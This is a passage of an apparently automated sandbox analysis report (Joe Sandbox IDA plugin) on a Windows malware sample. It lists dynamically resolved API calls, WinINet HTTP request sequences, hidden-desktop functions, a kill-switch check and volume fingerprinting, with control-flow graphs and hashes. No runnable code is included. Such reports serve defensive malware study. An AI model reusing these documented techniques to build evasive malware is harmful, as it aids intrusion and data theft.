                                  • GetProcAddress.KERNEL32(76F70000,00F96360), ref: 003668AB
                                  • GetProcAddress.KERNEL32(76F70000,00FAC7B8), ref: 003668C3
                                  • GetProcAddress.KERNEL32(76F70000,00FAC7D0), ref: 003668DC
                                  • GetProcAddress.KERNEL32(76F70000,00FAC860), ref: 003668F4
                                  • GetProcAddress.KERNEL32(76F70000,00FAC878), ref: 0036690C
                                  • GetProcAddress.KERNEL32(76F70000,00F96240), ref: 00366925
                                  • GetProcAddress.KERNEL32(76F70000,00FAC758), ref: 0036693D
                                  • GetProcAddress.KERNEL32(76F70000,00FAC788), ref: 00366955
                                  • GetProcAddress.KERNEL32(76F70000,00FAC890), ref: 0036696E
                                  • GetProcAddress.KERNEL32(76F70000,00FAC770), ref: 00366986
                                  • GetProcAddress.KERNEL32(76F70000,00FAC7E8), ref: 0036699E
                                  • GetProcAddress.KERNEL32(76F70000,00FAC800), ref: 003669B7
                                  • GetProcAddress.KERNEL32(76F70000,00FAC8A8), ref: 003669CF
                                  • GetProcAddress.KERNEL32(76F70000,00FAC368), ref: 003669E7
                                  • GetProcAddress.KERNEL32(76F70000,00FAC218), ref: 00366A00
                                  • GetProcAddress.KERNEL32(76F70000,00FACBB8), ref: 00366A18
                                  • GetProcAddress.KERNEL32(76F70000,00FAC260), ref: 00366A30
                                  • GetProcAddress.KERNEL32(76F70000,00FAC380), ref: 00366A49
                                  • GetProcAddress.KERNEL32(76F70000,00F963A0), ref: 00366A61
                                  • GetProcAddress.KERNEL32(76F70000,00FAC230), ref: 00366A79
                                  • GetProcAddress.KERNEL32(76F70000,00F963C0), ref: 00366A92
                                  • GetProcAddress.KERNEL32(76F70000,00FAC398), ref: 00366AAA
                                  • GetProcAddress.KERNEL32(76F70000,00FAC350), ref: 00366AC2
                                  • GetProcAddress.KERNEL32(76F70000,00F96400), ref: 00366ADB
                                  • GetProcAddress.KERNEL32(76F70000,00F96440), ref: 00366AF3
                                  • LoadLibraryA.KERNEL32(00FAC290,0036051F), ref: 00366B05
                                  • LoadLibraryA.KERNEL32(00FAC320), ref: 00366B16
                                  • LoadLibraryA.KERNEL32(00FAC338), ref: 00366B28
                                  • LoadLibraryA.KERNEL32(00FAC278), ref: 00366B3A
                                  • LoadLibraryA.KERNEL32(00FAC158), ref: 00366B4B
                                  • LoadLibraryA.KERNEL32(00FAC1A0), ref: 00366B5D
                                  • LoadLibraryA.KERNEL32(00FAC2A8), ref: 00366B6F
                                  • LoadLibraryA.KERNEL32(00FAC200), ref: 00366B80
                                  • GetProcAddress.KERNEL32(75840000,00F96820), ref: 00366B9C
                                  • GetProcAddress.KERNEL32(75840000,00FAC2C0), ref: 00366BB4
                                  • GetProcAddress.KERNEL32(75840000,00FA8A28), ref: 00366BCD
                                  • GetProcAddress.KERNEL32(75840000,00FAC140), ref: 00366BE5
                                  • GetProcAddress.KERNEL32(75840000,00F96620), ref: 00366BFD
                                  • GetProcAddress.KERNEL32(73C10000,00F9B008), ref: 00366C1D
                                  • GetProcAddress.KERNEL32(73C10000,00F965E0), ref: 00366C35
                                  • GetProcAddress.KERNEL32(73C10000,00F9B058), ref: 00366C4E
                                  • GetProcAddress.KERNEL32(73C10000,00FAC3B0), ref: 00366C66
                                  • GetProcAddress.KERNEL32(73C10000,00FAC170), ref: 00366C7E
                                  • GetProcAddress.KERNEL32(73C10000,00F96780), ref: 00366C97
                                  • GetProcAddress.KERNEL32(73C10000,00F96800), ref: 00366CAF
                                  • GetProcAddress.KERNEL32(73C10000,00FAC3C8), ref: 00366CC7
                                  • GetProcAddress.KERNEL32(760B0000,00F966C0), ref: 00366CE3
                                  • GetProcAddress.KERNEL32(760B0000,00F96740), ref: 00366CFB
                                  • GetProcAddress.KERNEL32(760B0000,00FAC2F0), ref: 00366D14
                                  • GetProcAddress.KERNEL32(760B0000,00FAC3E0), ref: 00366D2C
                                  • GetProcAddress.KERNEL32(760B0000,00F96900), ref: 00366D44
                                  • GetProcAddress.KERNEL32(75D30000,00F9B0A8), ref: 00366D64
                                  • GetProcAddress.KERNEL32(75D30000,00F9B1C0), ref: 00366D7C
                                  • GetProcAddress.KERNEL32(75D30000,00FAC1E8), ref: 00366D95
                                  • GetProcAddress.KERNEL32(75D30000,00F96840), ref: 00366DAD
                                  • GetProcAddress.KERNEL32(75D30000,00F965C0), ref: 00366DC5
                                  • GetProcAddress.KERNEL32(75D30000,00F9AEC8), ref: 00366DDE
                                  • GetProcAddress.KERNEL32(753A0000,00FAC308), ref: 00366DFE
                                  • GetProcAddress.KERNEL32(753A0000,00F96660), ref: 00366E16
                                  • GetProcAddress.KERNEL32(753A0000,00FA8B28), ref: 00366E2F
                                  • GetProcAddress.KERNEL32(753A0000,00FAC3F8), ref: 00366E47
                                  • GetProcAddress.KERNEL32(753A0000,00FAC248), ref: 00366E5F
                                  • GetProcAddress.KERNEL32(753A0000,00F96600), ref: 00366E78
                                  • GetProcAddress.KERNEL32(753A0000,00F96640), ref: 00366E90
                                  • GetProcAddress.KERNEL32(753A0000,00FAC410), ref: 00366EA8
                                  • GetProcAddress.KERNEL32(753A0000,00FAC2D8), ref: 00366EC1
                                  • GetProcAddress.KERNEL32(753A0000,CreateDesktopA), ref: 00366ED7
                                  • GetProcAddress.KERNEL32(753A0000,OpenDesktopA), ref: 00366EEE
                                  • GetProcAddress.KERNEL32(753A0000,CloseDesktop), ref: 00366F05
                                  • GetProcAddress.KERNEL32(76DA0000,00F96760), ref: 00366F21
                                  • GetProcAddress.KERNEL32(76DA0000,00FAC428), ref: 00366F39
                                  • GetProcAddress.KERNEL32(76DA0000,00FAC188), ref: 00366F52
                                  • GetProcAddress.KERNEL32(76DA0000,00FAC1B8), ref: 00366F6A
                                  • GetProcAddress.KERNEL32(76DA0000,00FAC1D0), ref: 00366F82
                                  • GetProcAddress.KERNEL32(77300000,00F967A0), ref: 00366F9E
                                  • GetProcAddress.KERNEL32(77300000,00F966A0), ref: 00366FB6
                                  • GetProcAddress.KERNEL32(767E0000,00F968C0), ref: 00366FD2
                                  • GetProcAddress.KERNEL32(767E0000,00FAC6E0), ref: 00366FEA
                                  • GetProcAddress.KERNEL32(6F6A0000,00F96680), ref: 0036700A
                                  • GetProcAddress.KERNEL32(6F6A0000,00F967C0), ref: 00367022
                                  • GetProcAddress.KERNEL32(6F6A0000,00F96860), ref: 0036703B
                                  • GetProcAddress.KERNEL32(6F6A0000,00FAC488), ref: 00367053
                                  • GetProcAddress.KERNEL32(6F6A0000,00F96920), ref: 0036706B
                                  • GetProcAddress.KERNEL32(6F6A0000,00F96880), ref: 00367084
                                  • GetProcAddress.KERNEL32(6F6A0000,00F968A0), ref: 0036709C
                                  • GetProcAddress.KERNEL32(6F6A0000,00F966E0), ref: 003670B4
                                  • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 003670CB
                                  • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 003670E2
                                  • GetProcAddress.KERNEL32(75760000,00FAC680), ref: 003670FE
                                  • GetProcAddress.KERNEL32(75760000,00FA8B58), ref: 00367116
                                  • GetProcAddress.KERNEL32(75760000,00FAC650), ref: 0036712F
                                  • GetProcAddress.KERNEL32(75760000,00FAC5A8), ref: 00367147
                                  • GetProcAddress.KERNEL32(762C0000,00F96940), ref: 00367163
                                  • GetProcAddress.KERNEL32(70000000,00FAC728), ref: 0036717F
                                  • GetProcAddress.KERNEL32(70000000,00F967E0), ref: 00367197
                                  • GetProcAddress.KERNEL32(70000000,00FAC698), ref: 003671B0
                                  • GetProcAddress.KERNEL32(70000000,00FAC590), ref: 003671C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: ac772bf242b9145505c37b17c6fb4640dfb795844d90ce98b7ddce2c59b07f66
                                  • Instruction ID: 3c22b8591c0068e048dae93f12d4d42862b4e8fe6121888a1b16df6fb4a22fff
                                  • Opcode Fuzzy Hash: ac772bf242b9145505c37b17c6fb4640dfb795844d90ce98b7ddce2c59b07f66
                                  • Instruction Fuzzy Hash: B0621DB56A12009FD754DF64FC8CA2A37BAF7A87513108919E95D83364DB34A8C8FB70
                                  APIs
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0035F1D5
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F1F1
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0035F1FC
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F215
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0035F220
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F239
                                  • lstrcpy.KERNEL32(00000000,00374FA0), ref: 0035F25E
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F28C
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F2C0
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F2F0
                                  • lstrlen.KERNEL32(00F96500), ref: 0035F315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: c93537c7b17b09a20051994426472c82d0fb3e4459d833084a843d3e7943fbab
                                  • Instruction ID: b6013b93e4e99e8534298d39b51e51c0f6a04d9e582bf26ceabdd794aa7a6677
                                  • Opcode Fuzzy Hash: c93537c7b17b09a20051994426472c82d0fb3e4459d833084a843d3e7943fbab
                                  • Instruction Fuzzy Hash: B1A28E709012029FCB22DF65D848E6ABBF5AF44311F5A8479EC09DB361EB31DC59DBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360013
                                  • lstrlen.KERNEL32(0036CFEC), ref: 003600BD
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003600E1
                                  • lstrlen.KERNEL32(0036CFEC), ref: 003600EC
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360110
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0036011B
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0036013F
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0036015A
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360189
                                  • lstrlen.KERNEL32(0036CFEC), ref: 00360194
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003601C3
                                  • lstrlen.KERNEL32(0036CFEC), ref: 003601CE
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360206
                                  • lstrlen.KERNEL32(0036CFEC), ref: 00360250
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00360288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0036059B
                                  • lstrlen.KERNEL32(00F96580), ref: 003605AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003605D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 003605E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0036060E
                                  • lstrlen.KERNEL32(00FADD90), ref: 00360625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0036064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 00360658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00360681
                                  • lstrlen.KERNEL32(00F96320), ref: 00360698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003606C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 003606D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00360706
                                  • lstrcpy.KERNEL32(00000000,00FA8AE8), ref: 0036074B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0036077F
                                  • lstrcpy.KERNEL32(00000000,00FADDC0), ref: 003607E7
                                  • lstrcpy.KERNEL32(00000000,00FA8958), ref: 00360858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 003608CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00360928
                                  • lstrcpy.KERNEL32(00000000,00FA8858), ref: 003609F8
                                    • Part of subcall function 003424E0: lstrcpy.KERNEL32(00000000,?), ref: 00342528
                                    • Part of subcall function 003424E0: lstrcpy.KERNEL32(00000000,?), ref: 0034254E
                                    • Part of subcall function 003424E0: lstrcpy.KERNEL32(00000000,?), ref: 00342577
                                  • lstrcpy.KERNEL32(00000000,00FA88E8), ref: 00360ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00360B81
                                  • lstrcpy.KERNEL32(00000000,00FA88E8), ref: 00360D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 0ffc3ace51001e4205ed874ce447f96e313e39092a09925f38032dbf3f2a6036
                                  • Instruction ID: f7bdbb389d63326ff43c17c773d494c841d07bc6979f9d696c72784271182042
                                  • Opcode Fuzzy Hash: 0ffc3ace51001e4205ed874ce447f96e313e39092a09925f38032dbf3f2a6036
                                  • Instruction Fuzzy Hash: 5EE26970A053418FC736DF29C489B6ABBE0BF89304F59C96DE48D8B366DB319845CB52

                                  Control-flow Graph

                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00346C6F
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00346CC2
                                  • InternetOpenA.WININET(0036CFEC,00000001,00000000,00000000,00000000), ref: 00346CD5
                                  • StrCmpCA.SHLWAPI(?,00FAE3C0), ref: 00346CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,00FADE20,00000000,00000000,-00400100,00000000), ref: 00346D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00346D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00346D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00346DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00346DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00346E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00346E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 00346E8E
                                  • InternetCloseHandle.WININET(?), ref: 00346E98
                                  • InternetCloseHandle.WININET(00000000), ref: 00346EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00346EC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: c56a71df36e08cc7daa74a7ae489cb320e9a08732e9ba38d870c91c00bde0ca1
                                  • Instruction ID: acbeb76b3656ddc3c91b0c8850bb7b96e53c15470685685218c7fc34ad057d82
                                  • Opcode Fuzzy Hash: c56a71df36e08cc7daa74a7ae489cb320e9a08732e9ba38d870c91c00bde0ca1
                                  • Instruction Fuzzy Hash: C6817F71A50215ABDB21DFA4DC4AFAE77F8EF45700F154068F909EB280DB70BD449BA1
                                  APIs
                                  • lstrlen.KERNEL32(00F96500), ref: 0035F315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035F3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035F47B
                                  • lstrcpy.KERNEL32(00000000,00F96500), ref: 0035F4BB
                                  • lstrcpy.KERNEL32(00000000,00FA8AD8), ref: 0035F4EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035F59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0035F61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0035F718
                                  • lstrlen.KERNEL32(00FA8B48), ref: 0035F746
                                  • lstrcpy.KERNEL32(00000000,00FA8B48), ref: 0035F771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035F793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035F7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0035FA32
                                  • lstrlen.KERNEL32(00FA8A58), ref: 0035FA60
                                  • lstrcpy.KERNEL32(00000000,00FA8A58), ref: 0035FA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035FAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035FAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: 1f3fff8967030d89bb35296dd76a995b8d2b9ffc9235a68d3af6b06c822c7b01
                                  • Instruction ID: 22842f61f14872075ca338cf58eef8c07f7bc2394b5b16a3013e4b6ff250bd0d
                                  • Opcode Fuzzy Hash: 1f3fff8967030d89bb35296dd76a995b8d2b9ffc9235a68d3af6b06c822c7b01
                                  • Instruction Fuzzy Hash: E4F13B70A01202CFDB26CF29D848E66B7F5BF54316B5A80B9D8099B271D731DC8ADB90

                                  Control-flow Graph

                                  control_flow_graph 2721 358ca0-358cc4 StrCmpCA 2722 358cc6-358cc7 ExitProcess 2721->2722 2723 358ccd-358ce6 2721->2723 2725 358ee2-358eef call 342a20 2723->2725 2726 358cec-358cf1 2723->2726 2727 358cf6-358cf9 2726->2727 2729 358ec3-358edc 2727->2729 2730 358cff 2727->2730 2729->2725 2770 358cf3 2729->2770 2732 358e56-358e64 StrCmpCA 2730->2732 2733 358d30-358d3f lstrlen 2730->2733 2734 358dbd-358dcb StrCmpCA 2730->2734 2735 358ddd-358deb StrCmpCA 2730->2735 2736 358dfd-358e0b StrCmpCA 2730->2736 2737 358e1d-358e2b StrCmpCA 2730->2737 2738 358e3d-358e4b StrCmpCA 2730->2738 2739 358d5a-358d69 lstrlen 2730->2739 2740 358d84-358d92 StrCmpCA 2730->2740 2741 358da4-358db8 StrCmpCA 2730->2741 2742 358d06-358d15 lstrlen 2730->2742 2743 358e6f-358e7d StrCmpCA 2730->2743 2744 358e88-358e9a lstrlen 2730->2744 2732->2729 2752 358e66-358e6d 2732->2752 2756 358d41-358d46 call 342a20 2733->2756 2757 358d49-358d55 call 342930 2733->2757 2734->2729 2745 358dd1-358dd8 2734->2745 2735->2729 2746 358df1-358df8 2735->2746 2736->2729 2747 358e11-358e18 2736->2747 2737->2729 2748 358e31-358e38 2737->2748 2738->2729 2749 358e4d-358e54 2738->2749 2758 358d73-358d7f call 342930 2739->2758 2759 358d6b-358d70 call 342a20 2739->2759 2740->2729 2761 358d98-358d9f 2740->2761 2741->2729 2750 358d17-358d1c call 342a20 2742->2750 2751 358d1f-358d2b call 342930 2742->2751 2743->2729 2753 358e7f-358e86 2743->2753 2754 358ea4-358eb0 call 342930 2744->2754 2755 358e9c-358ea1 call 342a20 2744->2755 2745->2729 2746->2729 2747->2729 2748->2729 2749->2729 2750->2751 2779 358eb3-358eb5 2751->2779 2752->2729 2753->2729 2754->2779 2755->2754 2756->2757 2757->2779 2758->2779 2759->2758 2761->2729 2770->2727 2779->2729 2780 358eb7-358eb9 2779->2780 2780->2729 2781 358ebb-358ebd lstrcpy 2780->2781 2781->2729
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 0aeeea82d31bc3e20b42742a766709dfb21b9d732df0f260d5d997f89455d65d
                                  • Instruction ID: b95e333442ad0049198ec7b42de0e42bc9d11c707926bca35abcc4f1a836d94e
                                  • Opcode Fuzzy Hash: 0aeeea82d31bc3e20b42742a766709dfb21b9d732df0f260d5d997f89455d65d
                                  • Instruction Fuzzy Hash: 50518170904701EFC7239F75EC89E6B77F8BB15701B10481DF846E6620DB78E849AB61

                                  Control-flow Graph

                                  control_flow_graph 2782 362740-362783 GetWindowsDirectoryA 2783 362785 2782->2783 2784 36278c-3627ea GetVolumeInformationA 2782->2784 2783->2784 2785 3627ec-3627f2 2784->2785 2786 3627f4-362807 2785->2786 2787 362809-362820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 362826-362844 wsprintfA 2787->2788 2789 362822-362824 2787->2789 2790 36285b-362872 call 3671e0 2788->2790 2789->2790
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0036277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003593B6,00000000,00000000,00000000,00000000), ref: 003627AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0036280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00362816
                                  • wsprintfA.USER32 ref: 0036283B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409
